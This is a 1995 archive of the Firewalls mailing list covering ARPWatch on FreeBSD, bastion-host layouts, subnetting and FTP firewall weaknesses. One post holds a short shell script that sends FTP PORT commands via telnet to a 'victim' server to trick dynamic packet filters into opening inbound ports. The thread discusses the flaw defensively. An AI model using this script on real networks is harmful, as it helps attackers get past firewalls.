Received: from zeus.ci.ua.pt (zeus.ci.ua.pt [193.136.80.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA05178 for ; Sat, 14 Oct 1995 14:04:48 -0700
Received: by zeus.ci.ua.pt (1.37.109.16/16.2) id AA138656696; Sat, 14 Oct 1995 21:38:16 GMT
From: Fernando Cozinheiro
Message-Id: <199510142138.AA138656696@zeus.ci.ua.pt>
Subject: ARPWatch under FreeBSD
To: firewalls@GreatCircle.COM
Date: Sat, 14 Oct 1995 21:38:16 +0000 (PWT)
Cc: cooker@zeus.ci.ua.pt (Fernando Cozinheiro)
Organization: Universidade de Aveiro, Portugal
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 884
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Dear friends:

A few days ago, I've seen on this mailing list several references about
ArpWatch, and I've tried to install it under FreeBSD. After small
modifications on the program, I've succeeded to compile it.

Whenever I run it, messages like "arpwatch: pcap open: /dev/bpf0:
Device not configured" appear on the syslog output file. Has anyone
already succeeded in using the ArpWatch program under FreeBSD?
--
Fernando Cozinheiro                   http://sweet.ua.pt/~cooker/
System & Network Administrator        Email: cooker@ci.ua.pt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Universidade de Aveiro                Phone:
Centro de Informatica                 UA:      +351 34 370200/Ext.2254
3810 Aveiro                           CIUA:    +351 34 370345
Portugal                              Telefax: +351 34 370214

From firewalls-owner Sat Oct 14 18:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA08342 for firewalls-outgoing; Sat, 14 Oct 1995 18:24:38 -0700
Received: from mickey.ovid.com (mickey.ovid.com [198.242.51.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id SAA08335 for ; Sat, 14 Oct 1995 18:24:34 -0700
Received: by mickey.ovid.com (8.6.12/3.1.090690-Ovid Technologies) id BAA23196; Sun, 15 Oct 1995 01:19:09 GMT
Date: Sat, 14 Oct 1995 19:19:09 -0600 (MDT)
From: Adam Prato
To: Fernando Cozinheiro
cc: firewalls@GreatCircle.COM, Fernando Cozinheiro
Subject: Re: ARPWatch under FreeBSD
In-Reply-To: <199510142138.AA138656696@zeus.ci.ua.pt>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 14 Oct 1995, Fernando Cozinheiro wrote:

> Date: Sat, 14 Oct 1995 21:38:16 +0000 (PWT)
> From: Fernando Cozinheiro
> To: firewalls@GreatCircle.COM
> Cc: Fernando Cozinheiro
> Subject: ARPWatch under FreeBSD
>
> Dear friends:
>
> A few days ago, I've seen on this mailing list several references about
> ArpWatch, and I've tried to install it under FreeBSD. After small
> modifications on the program, I've succeeded to compile it.
>
> Whenever I run it, messages like "arpwatch: pcap open:
> /dev/bpf0: Device not configured" appear on the syslog output file. Has
> anyone already succeeded in using the ArpWatch program under FreeBSD?
Perhaps you need to recompile your kernel with the following:

pseudo-device   bpfilter        4       #Berkeley packet filter

-arp

From firewalls-owner Sat Oct 14 22:00:17 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA10570 for firewalls-outgoing; Sat, 14 Oct 1995 21:52:32 -0700
Received: from risc.agsm.ucla.edu (risc.agsm.ucla.edu [164.67.163.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA10563 for ; Sat, 14 Oct 1995 21:52:30 -0700
Received: by risc.agsm.ucla.edu id AA28034 (5.67a/IDA-1.5 for firewalls@greatcircle.com); Sat, 14 Oct 1995 21:50:44 -0700
From: Tom Kozlowski
Message-Id: <199510150450.AA28034@risc.agsm.ucla.edu>
Subject: form recognition within WWW?
To: firewalls@greatcircle.com
Date: Sat, 14 Oct 1995 21:50:43 -0800 (PDT)
X-Mailer: ELM [version 2.4 PL22]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 469
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Any words of wisdom would be appreciated on this matter.

I am having problems with recognizing forms when using Netscape browser
1.1N. For example,
doesn't work for me. I am simply being refused login access in the above case.

For your information, with my Netscape browser I am going through a firewall
running CERN Web proxy server. Could this be related somehow to my firewall
setup?

Many thanks in advance!

Tom K.

From firewalls-owner Sat Oct 14 23:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA11696 for firewalls-outgoing; Sat, 14 Oct 1995 23:19:21 -0700
Received: from locust.net.ohio-state.edu (mail.net.ohio-state.edu [128.146.222.110]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id XAA11689 for ; Sat, 14 Oct 1995 23:19:18 -0700
Received: from bedbugs.net.ohio-state.edu (bedbugs [128.146.222.2]) by locust.net.ohio-state.edu (8.6.12/8.6.9) with ESMTP id CAA08785; Sun, 15 Oct 1995 02:15:46 -0400
Received: (from maf@localhost) by bedbugs.net.ohio-state.edu (8.6.12/8.6.9) id CAA06078; Sun, 15 Oct 1995 02:15:40 -0400
From: "Mark A. Fullmer"
Message-Id: <199510150615.CAA06078@bedbugs.net.ohio-state.edu>
Subject: Re: Various FTPs
To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson P.E. Information Security)
Date: Sun, 15 Oct 1995 02:15:40 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <9510130120.AA18104@uvs1.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Oct 12, 95 09:20:04 pm
Reply-To: maf@net.ohio-state.edu
X-Mailer: ELM [version 2.4 PL24 PGP1]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1271
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

A. Padgett Peterson, P.E. Information Security writes:
>
>I agree with Marcus concerning the problems in FTP & possibly IPV6
>will repair/replace it.
>For now I suspect that the answer is a
>Firewall that will only allow an Inward port 20 connection if
>the inside node already had a port 21 outward connection (No, I
>do not mean via "established" I mean the firewall should keep track
>of what connections exist).

If Victim is inside the firewall, all Attacker needs to do is coerce
Victim to initiate an outgoing connection to port 21 which then opens
up the firewall. If Victim has an anonymous FTP server running, and the
firewall allows a connection, this is just too easy:

#!/bin/sh
# replace A.B.C.D with your IPAddr
echo "
user anonymous
pass foo@bar.com
port A,B,C,D,0,21
list
quit
" | telnet victim 21

Set your srcPort to 20 and you're in, minimally to dstPort >= 1024.

Opening a back channel for FTP also implies trusting random FTP servers
on the Internet and the path to those servers. With point and click web
pages that open connections who knows where, most people probably have
no idea they just made an FTP connection to evil.hacker.site.com that
starts up an XscreenDump script back to all anonymous FTP users' machines.
--
mark
maf+@osu.edu

From firewalls-owner Sun Oct 15 08:30:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA17481 for firewalls-outgoing; Sun, 15 Oct 1995 08:17:33 -0700
Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA17474 for ; Sun, 15 Oct 1995 08:17:28 -0700
Received: from csa063.emirates.net.ae by ns2.emirates.net.ae (5.x/SMI-SVR495081401) id AA02856; Sun, 15 Oct 1995 19:15:37 +0400
Date: Sun, 15 Oct 1995 19:15:36 +0400
Message-Id: <9510151515.AA02856@ns2.emirates.net.ae>
X-Sender: forster@emirates.net.ae (Unverified)
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: forster@ns2.emirates.net.ae (Andrew & Terri Forster)
Subject: Courtney & NetStalker Software
Cc: frankw@in.net
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Sources of Courtney & NetStalker Software

I have recently read about these products and I haven't been successful in
locating an ftp or www site to access them or more info. Can anyone assist
me? Contact me direct if you feel your response isn't required by others.
Thanks in Advance
AMF
==========================================================================
Andrew M Forster              Email: forster@emirates.net.ae
                              Phone: +9712 262556 or +9712 453613
                              Fax:   +9712 465344
==========================================================================

From firewalls-owner Sun Oct 15 12:30:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA20104 for firewalls-outgoing; Sun, 15 Oct 1995 12:26:57 -0700
Received: from odin.community.net (odin.community.net [140.174.119.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA20097 for ; Sun, 15 Oct 1995 12:26:52 -0700
Received: from [140.174.226.108] (n108.coco.community.net [140.174.226.108]) by odin.community.net with SMTP id MAA07841 for ; Sun, 15 Oct 1995 12:24:20 -0700
Date: Sun, 15 Oct 1995 12:24:20 -0700
Message-Id: <199510151924.MAA07841@odin.community.net>
Subject: Re: Firewall1 Comparison -Reply
From: Bill Husler
To:
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Our local SunSoft rep just gave us a presentation on FW-1 and it seems that
FW-1 allows you to manage Cisco routers as well as FW-1 Filters (for
application gateway and Dynamic packet filtering). This would provide both
levels and on separate boxes while centralizing administration. Sounds
kinda cool.

Bill

>FW-1 includes application gateways for FTP and telnet while doing
>everything else with a dynamic packet filtering scheme. This puts
>both on the same hardware.
>
>It is common to use a router in conjunction with a host running an
>application gateway. If you put access lists into the router, you are
>now running packet filters and application gateways.
>

The opinions expressed here-in are my own. Any similarities between these
opinions and those of any other person - living or not - including my
employer are purely coincidental.
From firewalls-owner Sun Oct 15 14:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21834 for firewalls-outgoing; Sun, 15 Oct 1995 14:21:09 -0700
Received: from relay-4.mail.demon.net (relay-4.mail.demon.net [158.152.1.64]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA21827 for ; Sun, 15 Oct 1995 14:20:53 -0700
Received: from post.demon.co.uk by relay-4.mail.demon.net id sg.bs22150; 15 Oct 95 13:01 +0100
Received: from relay-4.mail.demon.net by relay-3.mail.demon.net id aa18831; 15 Oct 95 8:33 +0100
Received: by mntcmp2.demon.co.uk (Smail3.1.28.1 #5) id m0t4NUW-0006zaC; Sun, 15 Oct 95 07:28 GMT
Message-Id:
From: Jon Whitton
Subject: Firewalls
To: firewalls@greatcircle.com
Date: Sun, 15 Oct 1995 07:28:14 +0000 (GMT)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 2687
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We are planning to have a public access web/ftp site on the outside of a
firewall. This machine does not need to be 100% secure. Our internal office net
will also be connected to the same leaseline and this net will need to be secure.
We plan to use packet filters on the Ciscos and application proxies on the
bastion machine:

     ISP      +-----------+                       +-----------+
     Lease    |  Cisco    |                       |  Bastion  |  Application proxies
     -----    |  2501     |-----------------------|  machine  |  primary DNS
     Line     |           |          |            |           |
              +-----------+          |            +-----------+
                                     |
                                     |            +-----------+
                                     |            |  ftp/web  |  Insecure
                                     |------------|  machine  |  Public
                                     |            |           |  Access machine
                                     |            +-----------+
                                     |
                               +-----------+
                               |  Cisco    |  Dual Homed
                               |  2514     |  Gateway
                               |           |
                               +-----------+
                                     |
                                     |
                -------------------|------------------------   Secure Internal
                    |                  |                  |      TCP/IP Network
              +-----------+      +-----------+      +-----------+
              |  Machine  |      |  Machine  | ..... |  Machine  |
              |    1      |      |    2      |       |    n      |

The bastion will also be the primary DNS machine and have our main hostname
(something like mntcmp.co.uk).
My query is where can the ftp/web server be placed so that the traffic does
not need to go via the bastion machine. Obviously we need to keep the web/ftp
server as fast as possible, hence the requirement for it not to receive/TX
traffic via the bastion.

Is this possible?

I believe the Cisco 2501 can only route to one designated machine (bastion).
Is this correct? If so can we use a different Cisco to route ftp/www traffic
directly to the ftp/www server and all other traffic to the bastion?
Would this be a solution?

There will be no requirement for http to/from the secure office net. So a
routing solution may be possible?

TIA, Jon.

--
================================================================================

Jon Whitton.                       Internet Address: jonw@mntcmp2.demon.co.uk

================================================================================
--

From firewalls-owner Sun Oct 15 15:00:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA22591 for firewalls-outgoing; Sun, 15 Oct 1995 14:55:29 -0700
Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA22584 for ; Sun, 15 Oct 1995 14:55:25 -0700
Received: (pferguso@localhost) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) id OAA28030; Sun, 15 Oct 1995 14:52:17 -0700
From: Paul Ferguson
Message-Id: <199510152152.OAA28030@lint.cisco.com>
Subject: Re: Firewalls
To: jonw@mntcmp2.demon.co.uk (Jon Whitton)
Date: Sun, 15 Oct 95 14:52:17 PDT
Cc: firewalls@GreatCircle.COM
In-Reply-To: ; from "Jon Whitton" at Oct 15, 95 7:28 am
X-Mailer: ELM [version 2.3 PL11]
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> We are planning to have a public access web/ftp site on the outside of a
> firewall. This machine does not need to be 100% secure. Our internal office net
> will also be connected to the same leaseline and this net will need to be secure.
> We plan to use packet filters on the Ciscos and application proxies on the
> bastion machine:
>
>
>      ISP      +-----------+                       +-----------+
>      Lease    |  Cisco    |                       |  Bastion  |  Application proxies
>      -----    |  2501     |-----------------------|  machine  |  primary DNS
>      Line     |           |          |            |           |
>               +-----------+          |            +-----------+
>                                      |
>                                      |            +-----------+
>                                      |            |  ftp/web  |  Insecure
>                                      |------------|  machine  |  Public
>                                      |            |           |  Access machine
>                                      |            +-----------+
>                                      |
>                                +-----------+
>                                |  Cisco    |  Dual Homed
>                                |  2514     |  Gateway
>                                |           |
>                                +-----------+
>                                      |
>                                      |
>                 -------------------|------------------------   Secure Internal
>                     |                  |                  |      TCP/IP Network
>               +-----------+      +-----------+      +-----------+
>               |  Machine  |      |  Machine  | ..... |  Machine  |
>               |    1      |      |    2      |       |    n      |
>
> The bastion will also be the primary DNS machine and have our main hostname
> (something like mntcmp.co.uk).
>
> My query is where can the ftp/web server be placed so that the traffic does
> not need to go via the bastion machine. Obviously we need to keep the web/ftp
> server as fast as possible, hence the requirement for it not to receive/TX
> traffic via the bastion.
>
> Is this possible?
>
> I believe the Cisco 2501 can only route to one designated machine (bastion).
> Is this correct? If so can we use a different Cisco to route ftp/www traffic
> directly to the ftp/www server and all other traffic to the bastion?
> Would this be a solution?
>
> There will be no requirement for http to/from the secure office net. So a
> routing solution may be possible?
>

Routes, from an external perspective, can be defined to either singular
hosts or to entire networks. The latter is the most common. As long as
your DNS resolves requests to your WWW/FTP server, it should work fine.
I'm sure why you would think that you would need another router to
accomplish this. The only 'traffic' that would be going to your DNS host
is DNS lookups, which are necessary. :-)

- paul

>
--
Paul Ferguson                       ||        ||
cisco Systems                       ||        ||
Consulting Engineering             ||||      ||||
pferguso@cisco.com             ..:||||||:..:||||||:..
                                c i s c o  S y s t e m s

From firewalls-owner Sun Oct 15 17:00:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24459 for firewalls-outgoing; Sun, 15 Oct 1995 16:52:22 -0700
Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24452 for ; Sun, 15 Oct 1995 16:52:16 -0700
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA00874; Mon, 16 Oct 1995 09:45:35 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma000872; Mon Oct 16 09:45:27 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA03639; Mon, 16 Oct 1995 09:51:29 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9510152351.AA03639@citecub.citec.qld.gov.au>
Subject: Re: Various FTPs
To: matt@uts.EDU.AU (Jas)
Date: Mon, 16 Oct 95 9:51:28 EST
Cc: firewalls@greatcircle.com
In-Reply-To: <199510131806.EAA04335@lordmuck.itd.uts.edu.au>; from "Jas" at Oct 14, 95 4:06 am
X-Mailer: ELM [version 2.3 PL11]
content-length: 1000
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

My mailer thinks Jas said:
>
> Scott Barman wrote this...
>
> > On Thu, 12 Oct 1995 padgett@tccslr.dnet.mmc.com wrote:
>
> >> I agree with Marcus concerning the problems in FTP & possibly IPV6
> >> will repair/replace it. For now I suspect that the answer is a
>
> > I have been "observing" the output of the IETF for IPv6 and have seen
> > nothing regarding changing ftp. It seems their concerns are a larger
> > address space and security. I don't think I'm alone in my desire to see
> > something replace it and, as Marcus Ranum said about himself in a previous
> > note, I'm not "big" enough to try to force a change!
>
> well why don't we put our collective heads together and make a firewall
> friendly file transfer protocol?
> then we can have people write up the
> code on different platforms (we have enough knowledge here for almost
> every possible conceivable platform), and GPL the stuff. well? any
> takers? myself personally I'm in.
>

Why doesn't PASV do the trick?

Colin

From firewalls-owner Sun Oct 15 17:13:35 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA24806 for firewalls-outgoing; Sun, 15 Oct 1995 17:07:16 -0700
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id RAA24799 for ; Sun, 15 Oct 1995 17:07:11 -0700
Date: Sun, 15 Oct 1995 20:05:23 -0400 (EDT)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <951015200523.2106a541@hobbes.orl.mmc.com>
Subject: FTP vulnerabilities
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>If Victim is inside the firewall, all Attacker needs to do is coerce
>Victim to initiate an outgoing connection to port 21 which then opens
>up the firewall. If Victim has an anonymous FTP server running, and the
>firewall allows a connection, this is just too easy:

(commands omitted)

Wait a moment. First if I allow outward connections only (b) goes away.

Second if Joe connects to evil.nasty and I have an intelligent machine,
then it will allow evil.nasty to make a back connection only to Joe and
only to a port greater than 1023. I can even eliminate that by requiring
only PASV connections (how I wound up connecting to Marcus' machine).

- If only PASV (passive) connections are allowed, the question will never
come up. Why invent something when we already have a fix ?

I agree there is a possible vulnerability with std FTP (if Joe is allowing
services on ports above 1023, he may be in violation of policy & I will
probably notice it in one of my sweeps) but consider it minimal. It is
even more minimal if the Firewall enforces an "approved FTP site" list.
Warmly,
Padgett

From firewalls-owner Sun Oct 15 17:20:35 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA24020 for firewalls-outgoing; Sun, 15 Oct 1995 16:47:38 -0700
Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA24013 for ; Sun, 15 Oct 1995 16:47:28 -0700
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id JAA00747; Mon, 16 Oct 1995 09:40:34 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma000597; Mon Oct 16 09:40:07 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA02921; Mon, 16 Oct 1995 09:46:07 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9510152346.AA02921@citecub.citec.qld.gov.au>
Subject: Re: Firewall1 Comparison -Reply
To: dkaye@rds.com (Doug Kaye)
Date: Mon, 16 Oct 95 9:46:06 EST
Cc: firewalls@GreatCircle.COM
In-Reply-To: ; from "Doug Kaye" at Oct 13, 95 8:34 am
X-Mailer: ELM [version 2.3 PL11]
content-length: 1606
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

My mailer thinks Doug Kaye said:
>
> I'm seeing a lot of discussion on packet filters vs. application gateways. Does it make
> sense to implement both?

Why not? How much do you value the systems and information you are trying
to protect?

> Is it too expensive or overkill?

It isn't the cheapest solution but again, I ask, how much do you value the
systems and information you are trying to protect?

> If you implement both, where
> does the filter go -- on the public side of the application gateway? Is it possible to run both
> on the same hardware?
The really paranoid amongst us can implement the following:

                    'Outside'
                        |
                        |
              Router with filters
                        |
             -------------------
                        |
                        |
       bastion host with filters and gateways
                        |
                        |
             -------------------
                        |
                        |
              Router with filters
                        |
                        |
                    `Inside'

The external router provides spoofing protection and limits incoming
traffic to the permitted services (mail, news, a web server on the outer
net, ...).

The bastion runs application gateways AND filters. The filters provide a
way of double-checking the external router. With the same filters
installed, a rejected packet on the bastion immediately tells you the
filters on the external router have been bypassed.

The internal router is the last line of defence. Since we are allowing
connections to the bastion from the outside (mail, news, ...) we have to
assume that it could/will be compromised. This router slows things down
a bit more.

Colin

From firewalls-owner Sun Oct 15 17:30:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA25277 for firewalls-outgoing; Sun, 15 Oct 1995 17:24:00 -0700
Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA25260 for ; Sun, 15 Oct 1995 17:23:50 -0700
Received: by little-miami.iac.net id UAA18783; Sun, 15 Oct 1995 20:22:01 -0400
Date: Sun, 15 Oct 1995 20:21:54 -0400 (EDT)
From: Carl Jolley
To: Mark Bell
cc: Yannick Gravel , firewalls@GreatCircle.COM
Subject: Re: First and last subnet ???
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 14 Oct 1995, Mark Bell wrote:

> The subnet value - that is the portion of the address that is reserved
> for the subnet - cannot be all ones or all zeroes. i.e
>
> net address       135.148.  0.0
> default netmask   255.255.  0.0   (class B)
> subnet mask         0.  0.255.0
>                   -------------
> netmask           255.255.255.0
>
> The third byte cannot be 'all ones' or 'all zeroes' (referring to the
> binary subnet value - in this case what's in the 3rd byte).
>
> 255 (decimal) = 1111 1111 (binary), and obviously
>   0 (decimal) = 0000 0000 (binary)
>
> The subnets 135.148.255.0 and 135.148.0.0 cannot be used. If you have a cisco
> router, you may use the 135.148.0.0 subnet, if you set the 'subnet zero'
> parameter - see the manual - but note that other routers on the network may
> not forward the traffic to 135.148.0.0 if they have a subnet mask of
> 255.255.255.0 set for that net. The cause of the problem is RFC950,
> (subnetting ip networks) which was written in the days when net addresses
> were plentiful.
>
> If you have a class C address - say 198.143.35.0, and you subnet with a
> netmask of 255.255.255.192 (0xff.ff.ff.c0), you theoretically have the
> following subnets available:
>
> 198.143.35.0
             ^^^^

And just what is the subnet number of the above network with a mask of
0xff.ff.ff.c0 ? Somehow it looks suspiciously like zero to me.

> 198.143.35.64
> 198.143.35.128
> 198.143.35.192
>
> Without the 'subnet zero' feature, subnets 198.143.35.0 and 198.143.35.192
> cannot be used.

You just lost 50% of the address space. Another feature of IP!

> There are other routers with the 'subnet zero' feature available, but I
> don't have a list available.
>
> Hope this helps.
>
> Mark
> Marol Consulting
>
> On Wed, 11 Oct 1995, Yannick Gravel wrote:
>
> > Hi Net&Sys Security people,
> >
> > Something that everybody is talking about, but not everybody
> > is saying the same thing about subnetting:
> >
> > Yes, everybody agrees that we lose the first and last host of
> > each subnet for net.iding and broadcasting.
> >
> > But, some are saying that I can use all subnets; but others are
> > saying that we lose the first and last subnet...
> >
> > Whom truth is true..
> >
> > Thanks..
> >
> > Yannick Gravel
> > System administrator -- yannick.gravel@planet-int.net
> >
>

From firewalls-owner Sun Oct 15 18:00:09 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA26426 for firewalls-outgoing; Sun, 15 Oct 1995 17:50:09 -0700
Received: from citecuh.citec.qld.gov.au (citecuh.citec.qld.gov.au [203.5.10.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA26419 for ; Sun, 15 Oct 1995 17:50:01 -0700
Received: (from mail@localhost) by citecuh.citec.qld.gov.au (8.6.10/8.6.10) id KAA03548; Mon, 16 Oct 1995 10:43:15 +1000
Received: from citecub.citec.qld.gov.au(131.242.4.98) by citecuh.citec.qld.gov.au via smap (V1.3) id /mail/incoming/sma003545; Mon Oct 16 10:43:10 1995
Received: by citecub.citec.qld.gov.au (5.0/SMI-SVR4) id AA10408; Mon, 16 Oct 1995 10:49:13 +1000
From: sgcccdc@citec.qld.gov.au (Colin Campbell)
Message-Id: <9510160049.AA10408@citecub.citec.qld.gov.au>
Subject: Re: Firewalls
To: jonw@mntcmp2.demon.co.uk (Jon Whitton)
Date: Mon, 16 Oct 95 10:49:12 EST
Cc: firewalls@greatcircle.com
In-Reply-To: ; from "Jon Whitton" at Oct 15, 95 7:28 am
X-Mailer: ELM [version 2.3 PL11]
content-length: 3472
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi,

Try this:

                        Outside
                           |
                           |
                         Router
                           |
                           |
              --------------------------
                |                    |
                |                    |
             bastion          ftp/www/??? server
                |
                |
          --------------
                |
                |
              Router
                |
                |
       -----------------------
         |     |     |     |
         |     |     |     |
             Inside hosts

That way there is no physical way to bypass the bastion. The external
router must accept packets for either bastion and other server(s). The
application gateways should only accept connections from the inside. Of
course it means inside access to the external server is also via the
bastion but I do not consider that a bad thing.

Colin

My mailer thinks Jon Whitton said:
>
>
> We are planning to have a public access web/ftp site on the outside of a
> firewall. This machine does not need to be 100% secure.
> Our internal office net
> will also be connected to the same leaseline and this net will need to be secure.
> We plan to use packet filters on the Ciscos and application proxies on the
> bastion machine:
>
>
>      ISP      +-----------+                       +-----------+
>      Lease    |  Cisco    |                       |  Bastion  |  Application proxies
>      -----    |  2501     |-----------------------|  machine  |  primary DNS
>      Line     |           |          |            |           |
>               +-----------+          |            +-----------+
>                                      |
>                                      |            +-----------+
>                                      |            |  ftp/web  |  Insecure
>                                      |------------|  machine  |  Public
>                                      |            |           |  Access machine
>                                      |            +-----------+
>                                      |
>                                +-----------+
>                                |  Cisco    |  Dual Homed
>                                |  2514     |  Gateway
>                                |           |
>                                +-----------+
>                                      |
>                                      |
>                 -------------------|------------------------   Secure Internal
>                     |                  |                  |      TCP/IP Network
>               +-----------+      +-----------+      +-----------+
>               |  Machine  |      |  Machine  | ..... |  Machine  |
>               |    1      |      |    2      |       |    n      |
>
> The bastion will also be the primary DNS machine and have our main hostname
> (something like mntcmp.co.uk).
>
> My query is where can the ftp/web server be placed so that the traffic does
> not need to go via the bastion machine. Obviously we need to keep the web/ftp
> server as fast as possible, hence the requirement for it not to receive/TX
> traffic via the bastion.
>
> Is this possible?
>
> I believe the Cisco 2501 can only route to one designated machine (bastion).
> Is this correct? If so can we use a different Cisco to route ftp/www traffic
> directly to the ftp/www server and all other traffic to the bastion?
> Would this be a solution?
>
> There will be no requirement for http to/from the secure office net. So a
> routing solution may be possible?
>
> TIA, Jon.
>
> --
> ================================================================================
>
> Jon Whitton.
> Internet Address: jonw@mntcmp2.demon.co.uk
>
> ================================================================================
> --
>

From firewalls-owner Sun Oct 15 19:30:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id TAA28471 for firewalls-outgoing; Sun, 15 Oct 1995 19:20:24 -0700
Received: from locust.net.ohio-state.edu (locust.net.ohio-state.edu [128.146.222.110]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id TAA28464 for ; Sun, 15 Oct 1995 19:20:20 -0700
Received: from bedbugs.net.ohio-state.edu (bedbugs [128.146.222.2]) by locust.net.ohio-state.edu (8.6.12/8.6.9) with ESMTP id WAA10467; Sun, 15 Oct 1995 22:18:36 -0400
Received: (from maf@localhost) by bedbugs.net.ohio-state.edu (8.6.12/8.6.9) id WAA06578; Sun, 15 Oct 1995 22:18:35 -0400
From: "Mark A. Fullmer"
Message-Id: <199510160218.WAA06578@bedbugs.net.ohio-state.edu>
Subject: Re: FTP vulnerabilities
To: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson P.E. Information Security)
Date: Sun, 15 Oct 1995 22:18:35 -0400 (EDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <951015200523.2106a541@hobbes.orl.mmc.com> from "A. Padgett Peterson, P.E. Information Security" at Oct 15, 95 08:05:23 pm
Reply-To: maf@net.ohio-state.edu
X-Mailer: ELM [version 2.4 PL24 PGP1]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1381
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

A. Padgett Peterson, P.E. Information Security writes:

(on the topic of outgoing connection to TCP port 21 through firewall
automagically opens up all incoming TCP connects to ports > 1024 for the
initiating client)

>>If Victim is inside the firewall, all Attacker needs to do is coerce
>>Victim to initiate an outgoing connection to port 21 which then opens
>>up the firewall. If Victim has an anonymous FTP server running, and the
>>firewall allows a connection, this is just too easy:
>
>(commands omitted)
>
>Wait a moment.
>First if I allow outward connections only (b) goes away.

Maybe a web server that redirects your client to evil.nasty:21 then?
(is this possible?)

The point I was trying to make is that dynamic filters have a flaw in
that if an attacker can convince a client to send out a packet that
disables the firewall you lose. At least for FTP, as you've said, using
PASV is a better solution.

>Second if Joe connects to evil.nasty and I have an intelligent machine,
>then it will allow evil.nasty to make a back connection only to Joe and
